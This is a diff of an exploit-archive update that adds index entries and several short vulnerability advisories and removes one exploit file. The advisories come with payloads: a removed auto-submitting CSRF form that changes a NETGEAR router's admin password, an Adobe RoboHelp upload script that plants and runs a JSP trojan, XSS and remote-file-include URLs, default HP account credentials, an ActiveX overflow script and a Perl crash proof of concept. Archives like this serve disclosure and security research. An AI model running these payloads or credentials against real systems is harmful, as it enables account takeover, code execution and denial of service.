Updated 05_07_2014

files.csv

@@ -29885,7 +29885,6 @@ id,file,description,date,author,platform,type,port
 33147,platforms/php/webapps/33147.txt,"AJ Auction Pro 3.0 'txtkeyword' Parameter Cross Site Scripting Vulnerability",2009-08-05,"599eme Man",php,webapps,0
 33148,platforms/linux/dos/33148.c,"Linux Kernel 2.6.x 'posix-timers.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-06,"Hiroshi Shimamoto",linux,dos,0
 33149,platforms/php/webapps/33149.txt,"Alkacon OpenCms 7.x Multiple Input Validation Vulnerabilities",2009-08-06,"Katie French",php,webapps,0
-33150,platforms/hardware/webapps/33150.txt,"NETGEAR DGN2200 1.0.0.29_1.7.29_HotS - CSRF Vulnerability",2014-05-03,"Dolev Farhi",hardware,webapps,0
 33152,platforms/php/webapps/33152.txt,"PhotoPost PHP 3.3.1 'cat' Parameter Cross Site Scripting and SQL Injection Vulnerabilities",2009-08-07,"599eme Man",php,webapps,0
 33153,platforms/php/webapps/33153.txt,"SupportPRO SupportDesk 3.0 'shownews.php' Cross Site Scripting Vulnerability",2009-08-10,Moudi,php,webapps,0
 33154,platforms/php/webapps/33154.txt,"SQLiteManager 1.2 'main.php' Cross Site Scripting Vulnerability",2009-08-10,"Hadi Kiamarsi",php,webapps,0
@@ -29926,3 +29925,18 @@ id,file,description,date,author,platform,type,port
 33192,platforms/multiple/remote/33192.php,"Google Chrome <= 6.0.472 'Math.Random()' Random Number Generation Vulnerability",2009-08-31,"Amit Klein",multiple,remote,0
 33193,platforms/linux/dos/33193.c,"Linux Kernel 2.6.x 'drivers/char/tty_ldisc.c' NULL Pointer Dereference Denial of Service Vulnerability",2009-08-19,"Eric W. Biederman",linux,dos,0
 33195,platforms/php/webapps/33195.txt,"TeamHelpdesk Customer Web Service (CWS) 8.3.5 & Technician Web Access (TWA) 8.3.5 -  Remote User Credential Dump",2014-05-05,bhamb,php,webapps,0
+33197,platforms/php/webapps/33197.txt,"68 Classifieds 4.1 category.php cat Parameter XSS",2009-07-27,Moudi,php,webapps,0
+33198,platforms/php/webapps/33198.txt,"68 Classifieds 4.1 login.php goto Parameter XSS",2009-07-27,Moudi,php,webapps,0
+33199,platforms/php/webapps/33199.txt,"68 Classifieds 4.1 searchresults.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0
+33200,platforms/php/webapps/33200.txt,"68 Classifieds 4.1 toplistings.php page Parameter XSS",2009-07-27,Moudi,php,webapps,0
+33201,platforms/php/webapps/33201.txt,"68 Classifieds 4.1 viewlisting.php view Parameter XSS",2009-07-27,Moudi,php,webapps,0
+33202,platforms/php/webapps/33202.txt,"68 Classifieds 4.1 viewmember.php member Parameter XSS",2009-07-27,Moudi,php,webapps,0
+33203,platforms/multiple/remote/33203.txt,"GreenSQL Firewall 0.9.x WHERE Clause Secuity Bypass Vulnerability",2009-09-02,"Johannes Dahse",multiple,remote,0
+33204,platforms/php/webapps/33204.txt,"phpAuction 3.2 'lan' Parameter Remote File Include Vulnerability",2009-09-09,"Beenu Arora",php,webapps,0
+33205,platforms/windows/dos/33205.pl,"Nokia Multimedia Player 1.1 Remote Denial of Service Vulnerability",2009-09-01,"opt!x hacker",windows,dos,0
+33206,platforms/php/webapps/33206.txt,"MKPortal 1.x Multiple Modules Cross Site Scripting Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
+33207,platforms/windows/remote/33207.txt,"SmartVMD 1.3 ActiveX Control 'VideoMovementDetection.dll' Buffer Overflow Vulnerability",2009-09-01,"optix hacker",windows,remote,0
+33208,platforms/php/webapps/33208.txt,"MKPortal 1.x Multiple BBCode HTML Injection Vulnerabilities",2009-08-31,Inj3ct0r,php,webapps,0
+33209,platforms/jsp/webapps/33209.txt,"Adobe RoboHelp Server 8 Authentication Bypass Vulnerability",2009-09-03,Intevydis,jsp,webapps,0
+33210,platforms/multiple/remote/33210.txt,"HP Operations Manager Default Manager 8.1 Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0
+33211,platforms/multiple/remote/33211.txt,"HP Operations Dashboard 2.1 Portal Default Manager Account Remote Security Vulnerability",2009-09-03,Intevydis,multiple,remote,0

platforms/hardware/webapps/33150.txt

@@ -1,58 +0,0 @@
-# Exploit Title: CSRF in NETGEAR DGN2200 Admin panel
-
-# Date 02/05/2014
-
-# Exploit author: Dolev Farhi @f1nhack
-
-# Vendor homepage: http://netgear.com
-
-# Affected Firmware version: 1.0.0.29_1.7.29_HotS
-
-# Affected Hardware: NETGEAR DGN2200 Wireless ADSL Router
-
-
-
-
-Summary
-=======
-A CSRF Attack was discovered in the Admin panel of NETGEAR DGN2200 Router.
-
-Vulnerability Description
-=========================
-Cross Site Request Forgery attack (CSRF)
-
-PoC 
-====
-POST /password.cgi HTTP/1.1
-Host: 10.0.0.138
-Proxy-Connection: keep-alive
-Content-Length: 122
-Cache-Control: max-age=0
-Authorization: Basic QWRtaW46VG9vbGJveDEj
-Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
-Origin: http://10.0.0.138
-User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
-Content-Type: application/x-www-form-urlencoded
-Referer: http://10.0.0.138/PWD_password.htm
-Accept-Encoding: gzip,deflate,sdch
-Accept-Language: en-US,en;q=0.8
- 
-sysOldPasswd=OLDPASS&sysNewPasswd=NEWPASS&sysConfirmPasswd=NEWPASS&authTimeout=5&cfAlert_Apply=Apply
-
-
-Exploit
-=========
-<html>
-<body onload="javascript:document.forms[0].submit()">
-<H2>CSRF Exploit to change Admin password</H2>
-<form method="POST" name="form0" action="http://10.0.0.138/password.cgi">
-<input type="hidden" name="sysOldPasswd" value="OLDPASS"/>
-<input type="hidden" name="sysNewPasswd" value="NEWPASS"/>
-<input type="hidden" name="sysConfirmPasswd" value="NEWPASS"/>
-<input type="hidden" name="authTImeout" value="5"/>
-<input type="hidden" name="cfAlert_Apply" value="Apply"/>
-</form>
-</body>
-</html>
-
-

platforms/jsp/webapps/33209.txt

@@ -0,0 +1,32 @@
+source: http://www.securityfocus.com/bid/36245/info
+
+Adobe RoboHelp Server is prone to an authentication-bypass vulnerability. An attacker can exploit this issue to upload and execute arbitrary code with SYSTEM-level privileges.
+
+RoboHelp Server 8.0 is affected; other versions may also be vulnerable.
+
+b="-----------------------------111\r\n"
+b+="Content-Disposition: form-data; name=\"filename\"; filename=\"test.jsp\"\r\n"
+b+="Content-Type: application/x-java-archive\r\n\r\n"
+b+=data # source code of our JSP trojan here
+b+="\r\n"
+b+="-----------------------------111--\r\n"
+
+s="POST /robohelp/server?PUBLISH=1 HTTP/1.1\r\n"
+s+="Host: %s:%d\r\n"%(host, port)
+s+="User-Agent: Mozilla\r\n"
+s+="UID: 1234\r\n"
+s+="Content-Type: multipart/form-data; boundary=---------------------------111\r\n"
+s+="Content-Length: %d\r\n"%len(b)
+s+="\r\n"
+s+=b
+
+sock.sendall(s)
+reply=sock.recv(4000)
+
+
+
+Get the value of 'sessionid' from the reply and use it in the following to execute the JSP trojan:
+
+s="GET /robohelp/robo/reserved/web/%s/test.jsp HTTP/1.0\r\n\r\n" % session_id
+sock.sendall(s)
+

platforms/multiple/remote/33203.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36209/info
+
+GreenSQL Firewall is prone to a security-bypass vulnerability.
+
+An attacker can exploit this issue to bypass certain security restrictions. Successfully exploiting this issue may aid in SQL attacks on the underlying application.
+
+The following sample SQL expression is available:
+
+x=y=z 

platforms/multiple/remote/33210.txt

@@ -0,0 +1,11 @@
+source: http://www.securityfocus.com/bid/36253/info
+
+HP Operations Manager is prone to a remote security vulnerability.
+
+Operations Manager 8.1 for Windows is vulnerable; other versions may also be vulnerable.
+
+NOTE: This issue may be related to the issue documented in BID 37086 (HP Operations Manager Remote Unauthorized Access Vulnerability), but this has not been confirmed.
+
+Attackers can exploit this issue using readily available tools. The following authentication credentials are available:
+
+ovwebusr:OvW*busr1 

platforms/multiple/remote/33211.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36258/info
+
+HP Operations Dashboard is prone to a remote security vulnerability.
+
+Operations Dashboard 2.1 for Windows is vulnerable; other versions may also be vulnerable. 
+
+Attackers can exploit this issue using readily available tools. The following authentication credentials are available:
+
+j2deployer:j2deployer 

platforms/php/webapps/33197.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36208/info
+
+'68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+
+These issues affect 68 Classifieds 4.1; other versions may also be affected. 
+
+http://www.example.com/category.php?cat=[code]

platforms/php/webapps/33198.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36208/info
+ 
+'68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+ 
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+ 
+These issues affect 68 Classifieds 4.1; other versions may also be affected. 
+
+ http://www.example.com/login.php?goto=usercheckout.php&view=[code]

platforms/php/webapps/33199.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36208/info
+  
+'68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+  
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+  
+These issues affect 68 Classifieds 4.1; other versions may also be affected. 
+
+ http://www.example.com/searchresults.php?page=[code]

platforms/php/webapps/33200.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36208/info
+   
+'68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+   
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+   
+These issues affect 68 Classifieds 4.1; other versions may also be affected.
+ 
+ http://www.example.com/toplistings.php?page=[code]

platforms/php/webapps/33201.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36208/info
+    
+'68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+    
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+    
+These issues affect 68 Classifieds 4.1; other versions may also be affected.
+
+ http://www.example.com/viewlisting.php?view=[code]

platforms/php/webapps/33202.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36208/info
+     
+'68 Classifieds' is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
+     
+An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
+     
+These issues affect 68 Classifieds 4.1; other versions may also be affected.
+
+ http://www.example.com/viewmember.php?member=[code] 

platforms/php/webapps/33204.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36211/info
+
+phpAuction is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.
+
+Exploiting this issue may allow an attacker to compromise the application and the computer; other attacks are also possible.
+
+phpAuction 3.2 is vulnerable; other versions may also be affected.
+
+http://www.example.com/auction/index.php?lan=Evilshell 

platforms/php/webapps/33206.txt

@@ -0,0 +1,28 @@
+source: http://www.securityfocus.com/bid/36216/info
+
+Multiple modules of MKPortal are prone to cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials; other attacks are also possible. 
+
+http://www.example.com/index.php?ind=gbook&content=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=gbook&blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=gbook&message=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=whois&blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=lenta&output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=lenta&blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/metric/?output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/metric/?error=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/metric/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=recommend&blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/Anekdot/?output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/Anekdot/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/Anekdot/?contents=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/contact/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/contact/mail.php?to=1@1.1&mess=2&subj=3&headers=4&name=5&teme=6&soob=7&email=2@2.2&blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/speed/?output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/speed/?blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=horoscop&blocks=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/index.php?ind=horoscop&output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/catphones/index.php?output=%3Cscript%3Ealert(1)%3C/script%3E
+http://www.example.com/catphones/index.php?blocks=%3Cscript%3Ealert(1)%3C/script%3E 

platforms/php/webapps/33208.txt

@@ -0,0 +1,10 @@
+source: http://www.securityfocus.com/bid/36218/info
+
+MKPortal is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.
+
+Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible. 
+
+The following example data is available:
+
+[UttpRL=htttptp://example.com]example.com[/URL]
+[IMttpG]htttptps://example.com/image.php?i=1&dateline=[/IMG] 

platforms/windows/dos/33205.pl

@@ -0,0 +1,26 @@
+source: http://www.securityfocus.com/bid/36215/info
+
+Nokia Multimedia Player is prone to a remote denial-of-service vulnerability.
+
+An attacker can exploit this issue to cause the affected application to stop responding, denying service to legitimate users.
+
+This issue affects Nokia Multimedia Player 1.1.
+
+#[+] Discovered By   : Inj3ct0r
+#[+] Site            : Inj3ct0r.com
+#[+] support e-mail  : submit[at]inj3ct0r.com
+
+
+#!/usr/bin/perl
+#Nokia Multimedia Player 1.1 (.npl) Local Stack Overflow POC
+#Finded by : opt!x hacker
+#Download :
+http://nds1.nokia.com/phones/files/software/nokia_multimedia_player_en.exe
+#http://img136.imageshack.us/img136/6486/nokiai.png
+#http://img19.imageshack.us/img19/2512/nokiacrash.png
+#Greetz: H-RAF , his0k4
+my $junk="A"x 4;
+open(MYFILE,'>>nokia.npl');
+print MYFILE $junk;
+close(MYFILE);
+

platforms/windows/remote/33207.txt

@@ -0,0 +1,9 @@
+source: http://www.securityfocus.com/bid/36217/info
+
+SmartVMD ActiveX control is prone to a buffer-overflow vulnerability because the application fails to adequately check boundaries on user-supplied input.
+
+An attacker can exploit this issue to execute arbitrary code in the context of the application using the ActiveX control (typically Internet Explorer). Failed attacks will likely cause denial-of-service conditions.
+
+SmartVMD 1.3 is vulnerable; other versions may also be affected.
+
+<object classid='clsid:E3462D53-47A6-11D8-8EF6-DAE89272743C' id='test'></object> <input language=VBScript onclick=aidi() type=button value='test'> <script language='vbscript'> Sub aidi buff = String (9000, "a") test.StartVideoSaving (buff) End Sub </script>